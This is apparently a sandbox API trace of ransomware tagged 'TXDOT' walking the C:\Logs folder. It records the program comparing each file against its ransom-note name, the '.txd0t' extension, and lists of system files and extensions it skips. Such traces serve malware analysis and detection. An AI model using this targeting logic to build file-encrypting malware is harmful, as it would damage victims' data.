[0071.935] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.935] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-LiveId%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx" [0071.935] PathFindExtensionW (pszPath="Microsoft-Windows-LiveId%4Operational.evtx") returned=".evtx" [0071.935] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.935] StrCmpIW (psz1="Microsoft-Windows-LiveId%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.935] StrCmpIW (psz1="Microsoft-Windows-LiveId%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.935] StrCmpIW (psz1="Microsoft-Windows-LiveId%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.935] StrCmpIW (psz1="Microsoft-Windows-LiveId%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.935] StrCmpIW (psz1="Microsoft-Windows-LiveId%4Operational.evtx", psz2=" ransom ") returned 1 [0071.935] StrCmpIW (psz1="Microsoft-Windows-LiveId%4Operational.evtx", psz2="debug.txt") returned 1 [0071.935] StrCmpIW (psz1="Microsoft-Windows-LiveId%4Operational.evtx", psz2="boot.ini") returned 1 [0071.935] StrCmpIW (psz1="Microsoft-Windows-LiveId%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.935] StrCmpIW (psz1="Microsoft-Windows-LiveId%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.935] StrCmpIW (psz1="Microsoft-Windows-LiveId%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.935] StrCmpIW (psz1="Microsoft-Windows-LiveId%4Operational.evtx", psz2="ntldr") returned -1 [0071.935] StrCmpIW (psz1="Microsoft-Windows-LiveId%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.935] StrCmpIW (psz1="Microsoft-Windows-LiveId%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.935] StrCmpIW (psz1="Microsoft-Windows-LiveId%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.935] PathFindExtensionW (pszPath="Microsoft-Windows-LiveId%4Operational.evtx") returned=".evtx" [0071.935] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.935] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.935] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.935] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.935] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.936] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.936] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.936] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc93d06f0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc93d06f0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-MUI%4Admin.evtx", cAlternateFileName="MI30D3~1.EVT")) returned 1 [0071.936] StrCmpW (psz1="Microsoft-Windows-MUI%4Admin.evtx", psz2=".") returned 1 [0071.936] StrCmpW (psz1="Microsoft-Windows-MUI%4Admin.evtx", psz2="..") returned 1 [0071.936] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.936] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.936] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-MUI%4Admin.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx" [0071.936] PathFindExtensionW (pszPath="Microsoft-Windows-MUI%4Admin.evtx") returned=".evtx" [0071.936] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.936] StrCmpIW (psz1="Microsoft-Windows-MUI%4Admin.evtx", psz2="bootsect.bak") returned 1 [0071.936] StrCmpIW (psz1="Microsoft-Windows-MUI%4Admin.evtx", psz2="iconcache.db") returned 1 [0071.936] StrCmpIW (psz1="Microsoft-Windows-MUI%4Admin.evtx", psz2="thumbs.db") returned -1 [0071.936] StrCmpIW (psz1="Microsoft-Windows-MUI%4Admin.evtx", psz2=" ransomware ") returned 1 [0071.936] StrCmpIW (psz1="Microsoft-Windows-MUI%4Admin.evtx", psz2=" ransom ") returned 1 [0071.936] StrCmpIW (psz1="Microsoft-Windows-MUI%4Admin.evtx", psz2="debug.txt") returned 1 [0071.936] StrCmpIW (psz1="Microsoft-Windows-MUI%4Admin.evtx", psz2="boot.ini") returned 1 [0071.936] StrCmpIW (psz1="Microsoft-Windows-MUI%4Admin.evtx", psz2="desktop.ini") returned 1 [0071.936] StrCmpIW (psz1="Microsoft-Windows-MUI%4Admin.evtx", psz2="autorun.inf") returned 1 [0071.936] StrCmpIW (psz1="Microsoft-Windows-MUI%4Admin.evtx", psz2="ntuser.dat") returned -1 [0071.936] StrCmpIW (psz1="Microsoft-Windows-MUI%4Admin.evtx", psz2="ntldr") returned -1 [0071.936] StrCmpIW (psz1="Microsoft-Windows-MUI%4Admin.evtx", psz2="ntdetect.com") returned -1 [0071.936] StrCmpIW (psz1="Microsoft-Windows-MUI%4Admin.evtx", psz2="bootfont.bin") returned 1 [0071.936] StrCmpIW (psz1="Microsoft-Windows-MUI%4Admin.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.936] PathFindExtensionW (pszPath="Microsoft-Windows-MUI%4Admin.evtx") returned=".evtx" [0071.936] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.936] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.936] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.936] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.936] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.936] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.936] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.937] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc93aa49b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc93aa49b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-MUI%4Operational.evtx", cAlternateFileName="MI6F01~1.EVT")) returned 1 [0071.937] StrCmpW (psz1="Microsoft-Windows-MUI%4Operational.evtx", psz2=".") returned 1 [0071.937] StrCmpW (psz1="Microsoft-Windows-MUI%4Operational.evtx", psz2="..") returned 1 [0071.937] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.937] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.937] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-MUI%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx" [0071.937] PathFindExtensionW (pszPath="Microsoft-Windows-MUI%4Operational.evtx") returned=".evtx" [0071.937] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.937] StrCmpIW (psz1="Microsoft-Windows-MUI%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.937] StrCmpIW (psz1="Microsoft-Windows-MUI%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.937] StrCmpIW (psz1="Microsoft-Windows-MUI%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.937] StrCmpIW (psz1="Microsoft-Windows-MUI%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.937] StrCmpIW (psz1="Microsoft-Windows-MUI%4Operational.evtx", psz2=" ransom ") returned 1 [0071.937] StrCmpIW (psz1="Microsoft-Windows-MUI%4Operational.evtx", psz2="debug.txt") returned 1 [0071.937] StrCmpIW (psz1="Microsoft-Windows-MUI%4Operational.evtx", psz2="boot.ini") returned 1 [0071.937] StrCmpIW (psz1="Microsoft-Windows-MUI%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.937] StrCmpIW (psz1="Microsoft-Windows-MUI%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.937] StrCmpIW (psz1="Microsoft-Windows-MUI%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.937] StrCmpIW (psz1="Microsoft-Windows-MUI%4Operational.evtx", psz2="ntldr") returned -1 [0071.937] StrCmpIW (psz1="Microsoft-Windows-MUI%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.937] StrCmpIW (psz1="Microsoft-Windows-MUI%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.937] StrCmpIW (psz1="Microsoft-Windows-MUI%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.937] PathFindExtensionW (pszPath="Microsoft-Windows-MUI%4Operational.evtx") returned=".evtx" [0071.937] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.937] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.937] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.937] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.937] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.937] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.937] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.937] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9d33b19, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9d33b19, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-NCSI%4Operational.evtx", cAlternateFileName="MI483C~1.EVT")) returned 1 [0071.937] StrCmpW (psz1="Microsoft-Windows-NCSI%4Operational.evtx", psz2=".") returned 1 [0071.937] StrCmpW (psz1="Microsoft-Windows-NCSI%4Operational.evtx", psz2="..") returned 1 [0071.938] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.938] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.938] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-NCSI%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx" [0071.938] PathFindExtensionW (pszPath="Microsoft-Windows-NCSI%4Operational.evtx") returned=".evtx" [0071.938] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.938] StrCmpIW (psz1="Microsoft-Windows-NCSI%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.938] StrCmpIW (psz1="Microsoft-Windows-NCSI%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.938] StrCmpIW (psz1="Microsoft-Windows-NCSI%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.938] StrCmpIW (psz1="Microsoft-Windows-NCSI%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.938] StrCmpIW (psz1="Microsoft-Windows-NCSI%4Operational.evtx", psz2=" ransom ") returned 1 [0071.938] StrCmpIW (psz1="Microsoft-Windows-NCSI%4Operational.evtx", psz2="debug.txt") returned 1 [0071.938] StrCmpIW (psz1="Microsoft-Windows-NCSI%4Operational.evtx", psz2="boot.ini") returned 1 [0071.938] StrCmpIW (psz1="Microsoft-Windows-NCSI%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.938] StrCmpIW (psz1="Microsoft-Windows-NCSI%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.938] StrCmpIW (psz1="Microsoft-Windows-NCSI%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.938] StrCmpIW (psz1="Microsoft-Windows-NCSI%4Operational.evtx", psz2="ntldr") returned -1 [0071.938] StrCmpIW (psz1="Microsoft-Windows-NCSI%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.938] StrCmpIW (psz1="Microsoft-Windows-NCSI%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.938] StrCmpIW (psz1="Microsoft-Windows-NCSI%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.938] PathFindExtensionW (pszPath="Microsoft-Windows-NCSI%4Operational.evtx") returned=".evtx" [0071.938] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.938] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.938] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.938] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.938] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.938] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.938] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.938] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbcf0ff2, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcbcf0ff2, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-NetworkProfile%4Operational.evtx", cAlternateFileName="MIFC66~1.EVT")) returned 1 [0071.938] StrCmpW (psz1="Microsoft-Windows-NetworkProfile%4Operational.evtx", psz2=".") returned 1 [0071.938] StrCmpW (psz1="Microsoft-Windows-NetworkProfile%4Operational.evtx", psz2="..") returned 1 [0071.938] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.938] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.938] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-NetworkProfile%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx" [0071.939] PathFindExtensionW (pszPath="Microsoft-Windows-NetworkProfile%4Operational.evtx") returned=".evtx" [0071.939] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.939] StrCmpIW (psz1="Microsoft-Windows-NetworkProfile%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.939] StrCmpIW (psz1="Microsoft-Windows-NetworkProfile%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.939] StrCmpIW (psz1="Microsoft-Windows-NetworkProfile%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.939] StrCmpIW (psz1="Microsoft-Windows-NetworkProfile%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.939] StrCmpIW (psz1="Microsoft-Windows-NetworkProfile%4Operational.evtx", psz2=" ransom ") returned 1 [0071.939] StrCmpIW (psz1="Microsoft-Windows-NetworkProfile%4Operational.evtx", psz2="debug.txt") returned 1 [0071.939] StrCmpIW (psz1="Microsoft-Windows-NetworkProfile%4Operational.evtx", psz2="boot.ini") returned 1 [0071.939] StrCmpIW (psz1="Microsoft-Windows-NetworkProfile%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.939] StrCmpIW (psz1="Microsoft-Windows-NetworkProfile%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.939] StrCmpIW (psz1="Microsoft-Windows-NetworkProfile%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.939] StrCmpIW (psz1="Microsoft-Windows-NetworkProfile%4Operational.evtx", psz2="ntldr") returned -1 [0071.939] StrCmpIW (psz1="Microsoft-Windows-NetworkProfile%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.939] StrCmpIW (psz1="Microsoft-Windows-NetworkProfile%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.939] StrCmpIW (psz1="Microsoft-Windows-NetworkProfile%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.939] PathFindExtensionW (pszPath="Microsoft-Windows-NetworkProfile%4Operational.evtx") returned=".evtx" [0071.939] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.939] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.939] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.939] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.939] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.939] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.939] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.939] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ab3154, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ab3154, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Ntfs%4Operational.evtx", cAlternateFileName="MI6E98~1.EVT")) returned 1 [0071.939] StrCmpW (psz1="Microsoft-Windows-Ntfs%4Operational.evtx", psz2=".") returned 1 [0071.939] StrCmpW (psz1="Microsoft-Windows-Ntfs%4Operational.evtx", psz2="..") returned 1 [0071.939] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.939] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.939] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Ntfs%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx" [0071.939] PathFindExtensionW (pszPath="Microsoft-Windows-Ntfs%4Operational.evtx") returned=".evtx" [0071.939] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.940] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.940] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.940] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.940] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.940] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4Operational.evtx", psz2=" ransom ") returned 1 [0071.940] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4Operational.evtx", psz2="debug.txt") returned 1 [0071.940] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4Operational.evtx", psz2="boot.ini") returned 1 [0071.940] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.940] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.940] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.940] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4Operational.evtx", psz2="ntldr") returned -1 [0071.940] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.940] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.940] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.940] PathFindExtensionW (pszPath="Microsoft-Windows-Ntfs%4Operational.evtx") returned=".evtx" [0071.940] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.940] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.940] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.940] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.940] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.940] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.940] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.940] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ad9393, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ad9393, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Ntfs%4WHC.evtx", cAlternateFileName="MIB2AC~1.EVT")) returned 1 [0071.940] StrCmpW (psz1="Microsoft-Windows-Ntfs%4WHC.evtx", psz2=".") returned 1 [0071.940] StrCmpW (psz1="Microsoft-Windows-Ntfs%4WHC.evtx", psz2="..") returned 1 [0071.940] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.940] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.940] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Ntfs%4WHC.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx" [0071.940] PathFindExtensionW (pszPath="Microsoft-Windows-Ntfs%4WHC.evtx") returned=".evtx" [0071.940] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.940] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4WHC.evtx", psz2="bootsect.bak") returned 1 [0071.940] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4WHC.evtx", psz2="iconcache.db") returned 1 [0071.940] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4WHC.evtx", psz2="thumbs.db") returned -1 [0071.941] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4WHC.evtx", psz2=" ransomware ") returned 1 